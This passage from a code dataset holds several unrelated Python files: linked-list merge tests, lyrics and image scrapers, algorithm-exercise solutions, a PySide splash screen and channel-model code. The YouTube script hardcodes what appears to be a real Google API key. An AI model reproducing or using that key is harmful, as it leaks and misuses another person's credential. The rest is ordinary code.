linked list, with its head updated to reflect the new head of the merged list.\n \"\"\"\n\n # Define a cabeça das duas listas encadeadas e seus comprimentos\n head1 = linkedList_one.head\n head2 = linkedList_two.head\n len1 = linkedList_one.length\n len2 = linkedList_two.length\n\n # Define a cabeça da nova lista encadeada, escolhendo o menor valor entre as duas listas encadeadas\n if head1.data < head2.data:\n new_head = head1\n head1 = head1.next\n else:\n new_head = head2\n head2 = head2.next\n\n # Define o ponteiro atual como a cabeça da nova lista encadeada\n current = new_head\n\n # Percorre as duas LinkedLists simultaneamente, adicionando sempre o menor elemento na nova LinkedList\n while head1 and head2:\n if head1.data < head2.data:\n current.next = head1\n head1 = head1.next\n else:\n current.next = head2\n head2 = head2.next\n current = current.next\n\n # Adiciona o restante da LinkedList não percorrida\n current.next = head1 if head1 else head2\n\n # Atualiza a cabeça da primeira lista encadeada para a nova lista encadeada\n linkedList_one.head = new_head\n linkedList_one.length = len1 + len2\n\n # Retorna a nova lista encadeada combinada e ordenada\n return linkedList_one\n\n@pytest.fixture(scope=\"session\")\ndef data():\n \n array = []\n \n # test 1 data\n array.append([[2,6,7,8],[1,3,4,5,9,10]])\n\n # test 2 data\n array.append([[1,2,3,4,5],[6,7,8,9,10]])\n\n # test 3 data\n array.append([[6,7,8,9,10],[1,2,3,4,5]])\n\n # test 4 data\n array.append([[1,3,5,7,9],[2,4,6,8,10]])\n\n # test 5 data\n array.append([[0,1,2,3,4,5,7,8,9,10],[6]])\n\n # test 6 data\n array.append([[6],[0,1,2,3,4,5,7,8,9,10]])\n\n # test 7 data\n array.append([[1],[2]])\n\n # test 8 data\n array.append([[2],[1]])\n\n # test 9 data\n array.append([[1,1,1,3,4,5,5,5,10],[1,1,2,2,5,6,10,10]])\n \n return array\n\ndef test_1(data):\n \"\"\"\n Test evaluation for [[2,6,7,8],[1,3,4,5,9,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[0][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[0][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\n\ndef test_2(data):\n \"\"\"\n Test evaluation for [[1,2,3,4,5],[6,7,8,9,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[1][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[1][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_3(data):\n \"\"\"\n Test evaluation for [[6,7,8,9,10],[1,2,3,4,5]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[2][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[2][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_4(data):\n \"\"\"\n Test evaluation for [[1,3,5,7,9],[2,4,6,8,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[3][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[3][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_5(data):\n \"\"\"\n Test evaluation for [[0,1,2,3,4,5,7,8,9,10],[6]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[4][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[4][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [0,1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_6(data):\n \"\"\"\n Test evaluation for [[6],[0,1,2,3,4,5,7,8,9,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[5][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[5][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [0,1,2,3,4,5,6,7,8,9,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_7(data):\n \"\"\"\n Test evaluation for [[1],[2]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[6][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[6][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_8(data):\n \"\"\"\n Test evaluation for [[2],[1]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[7][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[7][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,2]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n\ndef test_9(data):\n \"\"\"\n Test evaluation for [[1,1,1,3,4,5,5,5,10],[1,1,2,2,5,6,10,10]]\n \"\"\"\n linkedlist_one = LinkedList()\n for item in data[8][0]:\n linkedlist_one.append(item)\n\n linkedlist_two = LinkedList()\n for item in data[8][1]:\n linkedlist_two.append(item)\n\n linkedlist_test = LinkedList()\n for item in [1,1,1,1,1,2,2,3,4,5,5,5,5,6,10,10,10]:\n linkedlist_test.append(item)\n\n assert mergeLinkedLists(linkedlist_one, linkedlist_two) == linkedlist_test\n","repo_name":"JoaoGabrielRA/DataStructureII","sub_path":"Week3/test_mergeLinkedLists.py","file_name":"test_mergeLinkedLists.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28766902179","text":"from playwright.sync_api import sync_playwright\n\nimport time\nimport random\nimport save_letras as sl\n\nimport requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\ninvisible_browser = False\n\ndef dibra_time(sec):\n delay = random.random()*sec\n time.sleep(delay)\n\ndef find_genres():\n res = requests.get('https://www.letras.mus.br/estilos/')\n print(\"The status code is \", res.status_code)\n soup_data = BeautifulSoup(res.text, 'html.parser')\n genres = soup_data.select(\"a[href^='/estilos/']\") \n href_genres = []\n for i in genres:\n href = href = i['href'].split('/')[-2]\n #print(href)\n href_genres.append(href)\n\n n = len(href_genres)\n print(f'All {n} genres found!')\n\n return(href_genres)\n\ndef find_artists_from_genre(genre):\n #genre must be in a specific format to find the right url\n with sync_playwright() as p:\n browser = p.chromium.launch(headless=invisible_browser)\n page = browser.new_page()\n dibra_time(4)\n page.goto(f\"https://www.letras.mus.br/estilos/{genre}/artistas.html\")\n\n page.locator('a:has-text(\"Ver todos os artistas\")').click()\n time.sleep(3)\n ul_artists = page.locator('ul[class=\"cnt-list cnt-list--col3\"]')\n print(ul_artists)\n\n artists = ul_artists.locator('a')\n n_artists = artists.count()\n\n print(f\"{n_artists} artists are found.\") \n\n href_artists = []\n for i in range(n_artists):\n href = artists.nth(i).get_attribute('href')\n #print(href)\n href_artists.append(href)\n\n print(f'{genre} finished!')\n\n browser.close()\n\n return(href_artists)\n\ndef find_songs_from_artist(artist):\n dibra_time(1)\n res = requests.get(f'https://www.letras.mus.br/{artist}/')\n soup_data = BeautifulSoup(res.text, 'html.parser')\n songs = soup_data.select(\"a[class='song-name']\")\n if (len(songs) == 0):\n songs = soup_data.select(\"li[class='cnt-list-row -song']\")\n href_songs = []\n for i in songs:\n href = i.find('a').get('href')\n href_songs.append(href)\n else:\n href_songs = []\n for i in songs:\n href = i['href']\n href_songs.append(href)\n\n print(f'{artist} songs found!')\n return(href_songs)\n\n\n# artist = artists['artists'][0].replace('/','')\n# genre = genres[0].split('\\\\')[-1].replace('.txt','')\n\n# genres = find_genres()\n\n# local_artists = 'E:/coding/github/webscraping_letras/data/raw/artists'\n# local_songs = 'E:/coding/github/webscraping_letras/data/raw/songs'\n\n# for genre in genres:\n# artists = find_artists_from_genre(genre)\n# sl.save_artists_from_genre(genre,artists,local_artists)\n\ndef find_lyric_from_song(song):\n res = requests.get(f'https://www.letras.mus.br/{song}')\n soup_data = BeautifulSoup(res.text, 'html.parser')\n\n header = soup_data.select(\"div[class='cnt-head cnt-head--l']\") \n all_lyric = soup_data.select(\"div[class='cnt-letra']\") \n\n for th in header:\n artist_output = th.find('span').text\n views = th.find(\"b\").text\n name_song = th.find(\"h1\").text\n song = f'Song: {name_song}'\n artist_output = f'Artist: {artist_output}'\n print('10')\n views = f'Views: {views}'\n print(artist_output)\n\n verses = []\n\n for i in all_lyric:\n aux = i.find_all(\"p\")\n n = len(aux)\n n_verses = f'Verses: {n}'\n\n for j in aux:\n verse = j.get_text(strip=True, separator= '\\n').splitlines()\n for z in verse:\n verses.append(z)\n verses.append('\\n')\n \n output = [song, artist_output,views, n_verses, verses]\n\n return(output)","repo_name":"santosfmpedro/webscraping_letras","sub_path":"src/site_genre_playwright.py","file_name":"site_genre_playwright.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14638395499","text":"from googleapiclient.discovery import build\n\n# Set up the YouTube Data API v3 service\napi_key = 'AIzaSyAZ1hJY41i1nmpAhAOAlc4gYN-u0kh4amI'\nyoutube = build('youtube', 'v3', developerKey=api_key)\n\n# Fetch the top trending videos\nrequest = youtube.videos().list(\n part='snippet',\n chart='mostPopular',\n regionCode='US', # Replace with your desired region code\n maxResults=10 # Number of top trending videos to fetch\n)\nresponse = request.execute()\n\n# Print the titles of the top trending videos\nprint('Top trending videos on YouTube:')\nfor item in response['items']:\n print(item['snippet']['title'])\n","repo_name":"Huntera948/Summarizer2","sub_path":"src/testing/unused_items/YouTube.py","file_name":"YouTube.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18695176340","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the findDigits function below.\ndef findDigits(n):\n nn = str(n);\n ans=0;\n\n for i in range(len(nn)):\n if int(nn[i])==0:\n continue;\n elif n%int(nn[i])==0:\n ans+=1;\n return ans; \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n result = findDigits(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n\n","repo_name":"bradykim7/Algorithm","sub_path":"HackerRank/Problem_Solving/implementation/Find_Digits.py","file_name":"Find_Digits.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6074223518","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef dfs(x, y, matrix):\n global area\n area += 1\n # 방문한 위치 0으로 변경\n matrix[x][y] = 0\n # 상하 좌우 확인\n for i in range(4):\n x0 = x + dx[i]\n y0 = y + dy[i]\n if (0<= x0 < M) and (0<= y0 < N):\n if matrix[x0][y0] != 0:\n dfs(x0, y0, matrix)\n\n# 영역 총 크기 받아서 map 할당\nM, N, K = map(int, input().split())\nMap = [[1] * N for _ in range(M)]\n\n# 사각형 영역에 대해 0으로 변환\nfor i in range(K):\n x1, y1, x2, y2 = map(int, input().split())\n for k in range(x1, x2): # [0, 1, 2]\n for j in range(y1, y2): # [4, 4]\n Map[j][k] = 0\n\n# 상하좌우 좌표\ndx = [0, 0, 1, -1]\ndy = [-1, 1, 0, 0]\n\n# 전체영역을 돌면서 영역의 크기 저장\nwhole_area = []\nfor i in range(M):\n for j in range(N):\n area = 0\n if Map[i][j] != 0:\n dfs(i, j, Map)\n whole_area.append(area)\n \nwhole_area.sort() \n\n# 구분된 영역의 수\nprint(len(whole_area))\n\n#구분된 영역을 오름차순으로 출력\nprint(*whole_area)\n\n# ver2\nimport sys\nsys.setrecursionlimit(10**6)\n\nM, N, K = map(int, input().split())\ngraph = [[1] * N for _ in range(M)]\n\nfor i in range(K):\n x1, y1, x2, y2 = map(int, input().split())\n for j in range(M-y1-1, M-y2-1, -1):\n for k in range(x1, x2):\n graph[j][k] = 0\n\ndef dfs(graph, y, x):\n global count\n count += 1\n graph[y][x] = 0\n\n dx = [0, 0, 1, -1]\n dy = [-1, 1, 0, 0]\n for i in range(4):\n x0 = x + dx[i]\n y0 = y + dy[i]\n if (0<= y0 < M) and (0<= x0 < N):\n if graph[y0][x0] != 0:\n dfs(graph, y0, x0)\narea_list = []\nfor y in range(M):\n for x in range(N):\n count = 0\n if graph[y][x] != 0:\n dfs(graph, y, x)\n area_list.append(count)\nprint(len(area_list))\narea_list.sort()\nprint(*area_list)\n\n","repo_name":"Sooho-Kim/Python_algorithm","sub_path":"01.baekjoon/baekjoon_2583.py","file_name":"baekjoon_2583.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23359875742","text":"#!/usr/bin/env python\n# count reads to bins with cell barcode\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='count reads to bins with bin/cell coordinate')\nparser.add_argument('-i', type=str, dest=\"input\", help='input bam file')\nparser.add_argument('-g', '--genomeSize', type=str, dest=\"genomeSize\", help='genome size')\nparser.add_argument('-b', '--binSize', type=int, dest=\"binSize\", default=5000, help='bin size')\nparser.add_argument('-o', type=str, dest=\"output\", help='output prefix')\n\nargs = parser.parse_args()\n\nimport sys\nimport pysam\nimport copy\nimport numpy as np\nfrom collections import Counter\nimport pybedtools\nfrom time import perf_counter as pc\nfrom scipy import sparse\nfrom scipy.sparse import save_npz\n\ndef is_sorted_queryname(header):\n \"\"\"\n Check if bam fiel is sorted by read name.\n \"\"\"\n if(\"HD\" in header):\n if(\"SO\" in header[\"HD\"]):\n if(header[\"HD\"][\"SO\"] == \"queryname\"):\n return True\n return False\n\ndef bins_maker(genomeSize, bin_size):\n genomeSizes = pybedtools.BedTool(genomeSize)\n bins = genomeSizes.window_maker(g=genomeSize, w=bin_size)\n bin_dict = {}\n idx = 0\n for i in bins:\n chr = i.chrom\n start = i.start\n end = i.end\n key = (chr+\"\\t\"+str(start)+\"\\t\"+str(end))\n bin_dict[key] = idx\n idx += 1\n return bin_dict\n\ndef get_genSize(headerSQ):\n genSize = {}\n for i in range(len(headerSQ)):\n key, values = headerSQ[i][\"SN\"], headerSQ[i][\"LN\"]\n genSize[key]= values\n return genSize\n \ndef main():\n bamf = args.input\n bin_size = int(args.binSize)\n genomeSize = args.genomeSize\n outf = args.output\n start_time = pc()\n # start reading the bam\n samfile = pysam.AlignmentFile(bamf, \"rb\")\n # check if bam file is sorted by name or not\n if not is_sorted_queryname(samfile.header):\n sys.exit(\"Error: bam needs to be sorted by read name\")\n \n # get chormosome size from header \n headerSQ = samfile.header[\"SQ\"]\n genSizes = get_genSize(headerSQ)\n bins_dict = bins_maker(genomeSize, bin_size)\n idx = 0 \n counts = {}\n barcodes = {}\n barcode_tmp = \"AAA\"\n n_lines = 0\n while True:\n try:\n read1 = next(samfile)\n read2 = next(samfile)\n except: # to the end\n break\n n_lines += 1\n if n_lines% 1000000 == 0 :\n print( \"%s read pairs processed.\"%n_lines)\n if read1.is_proper_pair:\n if read1.is_read1:\n pass\n else:\n tmp = copy.deepcopy(read1)\n read1 = read2\n read2 = tmp\n ref1 = read1.reference_name\n ref2 = read2.reference_name\n barcode = read1.qname.strip().split(\":\")[0]\n if barcode not in barcodes:\n barcodes[barcode] = idx\n idx += 1\n length = read1.reference_length\n if not read1.is_reverse:\n pos = read1.reference_start\n else:\n pos = read2.reference_start\n chrSize1 = int(genSizes[ref1])\n chrSize2 = int(genSizes[ref2])\n if(ref1 == ref2 and abs(read1.reference_start//bin_size - read1.next_reference_start//bin_size) <= 1):\n if (pos//bin_size + 1) * bin_size < chrSize1:\n key = (ref1+\"\\t\"+str((pos//bin_size) * bin_size)+\"\\t\"+str((pos//bin_size + 1) * bin_size)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n else:\n key = (ref1+\"\\t\"+str((pos//bin_size) * bin_size)+\"\\t\"+str(chrSize1)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n if(ref1 == ref2 and abs(read1.reference_start//bin_size - read1.next_reference_start//bin_size) > 1):\n midpos = pos + length * 0.5\n if (midpos//bin_size + 1) * bin_size < chrSize1:\n key = (ref1+\"\\t\"+str((midpos//bin_size) * bin_size)+\"\\t\"+str((midpos//bin_size + 1) * bin_size)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n else:\n key = (ref1+\"\\t\"+str((midpos//bin_size) * bin_size)+\"\\t\"+str(chrSize1)+\"\\t\"+read1.qname+\"\\t\"+\".\"+\"\\t\"+\"+\"+\"\\t\"+barcode)\n if key in counts:\n counts[key] += 1\n else:\n counts[key] = 1\n\n samfile.close()\n outbed = \".\".join([outf,\"bed\"])\n outmat = \".\".join([outf,\"mat\"])\n outxgi = \".\".join([outf,\"xgi\"])\n outygi = \".\".join([outf,\"ygi\"])\n outnpz = \".\".join([outf,\"npz\"])\n with open(outxgi, 'w') as outxgi:\n for key, val in barcodes.items():\n outxgi.write(key + \"\\n\")\n outxgi.close()\n\n with open(outygi, 'w') as outygi:\n for key, val in bins_dict.items():\n outygi.write(key + \"\\n\")\n outygi.close()\n\n with open(outbed, 'w') as outbed:\n for key,val in counts.items():\n outbed.write(str(key) + \"\\t\" + str(val) + \"\\n\")\n outbed.close()\n\n with open(outmat, 'w') as outmat:\n xgi = []\n ygi = []\n ct = []\n for key,val in counts.items():\n items = key.strip().split(\"\\t\")\n xgi_key = items[3]\n ygi_key = items[0]+\"\\t\"+items[1]+\"\\t\"+items[2]\n xgi_idx = barcodes[xgi_key]\n ygi_idx = bins_dict[ygi_key]\n outmat.write(str(xgi_idx) + \"\\t\" + str(ygi_idx) + \"\\t\" + str(val) + \"\\n\")\n xgi.append(xgi_idx)\n ygi.append(ygi_idx)\n ct.append(val)\n cooMx = sparse.coo_matrix((ct,(xgi,ygi)))\n save_npz(outnpz, cooMx)\n outmat.close()\n end_time = pc()\n print('Used (secs): ', end_time - start_time)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"yal054/snATAC","sub_path":"snATAC.ct2bin.py","file_name":"snATAC.ct2bin.py","file_ext":"py","file_size_in_byte":6148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"35609804872","text":"# Kullanıcının girdiği boy ve ağırlık değerlerine göre vücut kitle indeksini (VKİ = ağırlık/(boy*boy)) hesaplayınız.\nkisiKilo = input(\"Lütfen kilonuzu giriniz: \")\nkisiBoy = input(\"Lütfen boyunuzu giriniz(metre cinsinde): \")\n\nkisiKiloAsFloat = float(kisiKilo)\nkisiBoyAsFloat = float(kisiBoy)\n\nvkindeks = kisiKiloAsFloat/(kisiBoyAsFloat*kisiBoyAsFloat)\n\nprint(f\"Vücut kitle indeksiniz: {vkindeks}\")\n","repo_name":"ibrahimkaraca19/Istanbul-Kodluyor-Odevler","sub_path":"24 Ekim Ödevleri/1-vki.py","file_name":"1-vki.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39681986002","text":"import sys\nfrom PySide2 import QtCore\nfrom PySide2.QtGui import (QColor)\nfrom PySide2.QtWidgets import *\n\n# SPLASH SCREEN\nfrom ui_splash_screen import Ui_SplashScreen\n\n\n# GLOBALS\ncounter = 0\n\n\n# LOADING SCREEN\nclass SplashScreen(QMainWindow):\n def __init__(self):\n QMainWindow.__init__(self)\n self.ui = Ui_SplashScreen()\n self.ui.setupUi(self)\n\n # REMOVE TITLE BAR\n self.setWindowFlag(QtCore.Qt.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n\n # DROP SHADOW EFFECT\n self.shadow = QGraphicsDropShadowEffect(self)\n self.shadow.setBlurRadius(20)\n self.shadow.setXOffset(0)\n self.shadow.setYOffset(0)\n self.shadow.setColor(QColor(0, 0, 0, 60))\n self.ui.dropShadowFrame.setGraphicsEffect(self.shadow)\n\n # TIMER START\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.progress)\n\n # TIMER IN MILLISECONDS\n self.timer.start(35)\n\n # CHANGE DESCRIPTION\n\n # Initial Text\n self.ui.label_description.setText(\"WELCOME TO MY APPLICATION\")\n\n # Change Texts\n QtCore.QTimer.singleShot(1500, lambda: self.ui.label_description.setText(\"LOADING DATABASE\"))\n QtCore.QTimer.singleShot(3000, lambda: self.ui.label_description.setText(\"\"\n \"LOADING USER INTERFACE\"))\n\n # SHOW MAIN WINDOW\n self.show()\n # END\n\n # APP FUNCTIONS\n def progress(self):\n\n global counter\n\n # SET VALUE TO PROGRESS BAR\n self.ui.progressBar.setValue(counter)\n\n # CLOSE SPLASH SCREE AND OPEN APP\n if counter > 100:\n # STOP TIMER\n self.timer.stop()\n\n # SHOW MAIN WINDOW\n # ADD FURTHER\n\n from home import main\n # CLOSE SPLASH SCREEN\n\n self.close()\n main()\n # INCREASE COUNTER\n counter += 1\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = SplashScreen()\n sys.exit(app.exec_())\n","repo_name":"raj713335/PARIKSHA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35261350345","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport sys\r\nimport re\r\n\r\n\r\nglobal dir_path\r\ndir_path = \"d:\\\\bcy.net\\\\\"\r\n\r\ndef get_page(url):\r\n response = requests.get(url)\r\n content = BeautifulSoup(response.text, \"html.parser\")\r\n if content.find(text=\"尾页\"):\r\n return re.sub('(.+p=)|([^0-9]*)', \"\", str(content.find(text=\"尾页\").parent))\r\n else:\r\n return 0\r\n\r\n\r\ndef get_url(url): #获取网址\r\n response = requests.get(url)\r\n content = BeautifulSoup(response.text, \"html.parser\")\r\n\r\n '''\r\n global page_tag\r\n if page_tag == 0:\r\n page_tag = True\r\n # 正则表达式匹配尾页数,content.find().parent 表示内容对应的那一个tag\r\n global page\r\n if content.find(text=\"尾页\"):\r\n page = re.sub('(.+p=)|([^0-9]*)', \"\", str(content.find(text=\"尾页\").parent))\r\n '''\r\n\r\n url_back = content.find_all(attrs={\"class\": \"db posr ovf\"}) #根据HTML修改类型\r\n url_list = []\r\n for a in url_back:\r\n url_list.append(a.attrs.get(\"href\"))\r\n return url_list\r\n\r\n\r\ndef get_picture(url): #获取图片\r\n #作品编号\r\n item_id = re.search('[0-9]+', url).group(0)\r\n #粉丝可见标记\r\n fans_tag = False\r\n #作品地址\r\n url = \"https://bcy.net\"+url\r\n response = requests.get(url)\r\n content = BeautifulSoup(response.text, 'html.parser')\r\n # 作者名称\r\n name = content.find(class_='user-name').get_text()\r\n html_script = content.find_all('script')\r\n aim_script = ''\r\n for i in html_script:\r\n if 'window.__ssr_data' in i.text:\r\n aim_script = i\r\n break\r\n\r\n url_list = []\r\n aim_script = aim_script.text.split(\",\")\r\n for i in aim_script:\r\n\r\n if 'original_path' in i:\r\n i = re.sub(r\".*https\", \"\", i)\r\n i = re.sub(r\"\\\\\\\\u002F\", \"/\", i)\r\n i = \"https\"+re.sub(r\"\\\\\\\"}||]\", \"\", i)\r\n url_list.append(i)\r\n elif'粉丝可见' in i:\r\n fans_tag = True\r\n break\r\n\r\n if not(url_list or fans_tag):\r\n return None\r\n\r\n path = dir_path+name+'_'+item_id\r\n if not os.path.exists(path):\r\n # 如果不存在则创建目录\r\n os.makedirs(path)\r\n print(name+'_'+item_id + \" 作品开始保存\")\r\n else:\r\n # 如果目录存在则不创建,并提示目录已存在\r\n print(name+'_'+item_id+\" 已保存作品,无需重复保存\")\r\n print(\"_________________________________\")\r\n return None\r\n\r\n if fans_tag:\r\n fp = open(path+'/粉丝可见.txt ', 'w')\r\n fp.close()\r\n else:\r\n j = 1\r\n for i in url_list:\r\n fp = open(path + '/' + str(j) + '.jpg ', 'wb+')\r\n fp.write(requests.get(i, timeout=30).content)\r\n fp.close()\r\n j += 1\r\n\r\n print(\"保存完成\")\r\n print(\"_________________________________\")\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"输入你要搜索的关键字吧,就跟半次元里的搜索一样(默认路径D:\\ bcy.net 保存图片)\")\r\n name = input()\r\n print(\"如果想更改图片保存路径请以类似D:\\ bcy.net 的格式输入路径,否则请输入回车(Enter)\")\r\n path = input()\r\n if path != \"\":\r\n print(\"保存路径修改为:\"+path)\r\n dir_path = path\r\n\r\n dir_path = dir_path+name+'\\\\'\r\n url = \"https://bcy.net/search/home?k=\"+name\r\n page = int(get_page(url))\r\n\r\n if page == 0:\r\n print(\"无相关内容\")\r\n sys.exit(1)\r\n\r\n for i in range(1, page+1):\r\n print(i)\r\n print(\"_________________________________\")\r\n u_l = get_url(url + \"&p=\"+str(i))\r\n for i in u_l:\r\n try:\r\n get_picture(i)\r\n except:\r\n continue\r\n","repo_name":"jososo/bcy_picture_spider","sub_path":"getpic.py","file_name":"getpic.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"23684561435","text":"import unittest\nfrom textfileconverter import FileHandler, sanitize_input, convert_to_custom_format\n\nclass TestTextFileConverter(unittest.TestCase):\n def setUp(self):\n self.file_handler = FileHandler()\n self.test_file_path = 'test_file.txt'\n self.test_content = 'Hello\\nWorld'\n self.sanitized_content = 'Hello\\nWorld'\n self.custom_format_content = ' - \"Hello\"\\n - \"World\"'\n\n def test_read_file(self):\n with open(self.test_file_path, 'w') as f:\n f.write(self.test_content)\n content = self.file_handler.read_file(self.test_file_path)\n self.assertEqual(content, self.test_content)\n\n def test_read_file_non_existent(self):\n with self.assertRaises(Exception):\n self.file_handler.read_file('non_existent_file.txt')\n\n def test_write_file(self):\n self.file_handler.write_file(self.test_file_path, self.test_content)\n with open(self.test_file_path, 'r') as f:\n content = f.read()\n self.assertEqual(content, self.test_content)\n\n def test_sanitize_input(self):\n sanitized_text = sanitize_input(self.test_content)\n self.assertEqual(sanitized_text, self.sanitized_content)\n\n def test_convert_to_custom_format(self):\n custom_text = convert_to_custom_format(self.sanitized_content)\n self.assertEqual(custom_text, self.custom_format_content)\n\n def tearDown(self):\n try:\n os.remove(self.test_file_path)\n except:\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gladiopeace/repo1_test","sub_path":"textfileconverter_test.py","file_name":"textfileconverter_test.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36530347030","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\n# import opensimplex \n\nAntenna_gain=18 #dBi\n# Shadow_fading=4 #dB\n\ncarrier_frequency = 28 # GHz\n\ndef DoDistance(x1,y1,x2,y2):\n return np.sqrt((x2-x1)**2 + (y2-y1)**2)\n\ndef DoThroughput(transmit_bandwidth,SNR):\n \"\"\"\n calculate throughput by shannon capacity\n Arg:\n transmit_bandwidth: unit(Hz)\n SNR : Signal-to-noise ratio(SNR) no unit\n \n return:\n Throughput\n \"\"\"\n return transmit_bandwidth*np.log2(1+SNR)\n\ndef DoSNR(Conncection_Status,Recived_power,Noise_power):\n \"\"\"\n calculate SNR \n Arg:\n Recived_power : unit(w)\n Noise_power: unit(w)\n Conncection_Status : no unit\n \n return:\n SNR\n \"\"\"\n \n\n return (Conncection_Status*Recived_power)/Noise_power\n\ndef DoChannelModel(Transmit_power,Antenna_gain,Path_loss,Los_Probability):\n \"\"\"\n calculate Recived_power by 3GPP spec\n Arg:\n Recived_power: unit (dBm)\n Transmit_power: unint (dB)\n Antenna_gain: unit (dB)\n Path_loss: unit (dB)\n Shadow_fading: unit (dB)\n \n return:\n Recived_power\n \"\"\"\n if Transmit_power == float('-Inf'):\n return float('-Inf')\n\n if Los_Probability == 1:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 4\n else:\n Recived_power = Transmit_power + Antenna_gain - Path_loss - 8.2\n \n return Recived_power\n\ndef IndoorDoChannelModel(Transmit_power,Antenna_gain,Path_loss,Los_Probability):\n \"\"\"\n calculate Recived_power by 3GPP spec\n Arg:\n Recived_power: unit (dBm)\n Transmit_power: unint (dB)\n Antenna_gain: unit (dB)\n Path_loss: unit (dB)\n Shadow_fading: unit (dB)\n \n return:\n Recived_power\n \"\"\"\n if Transmit_power == float('-Inf'):\n return float('-Inf')\n\n if Los_Probability == 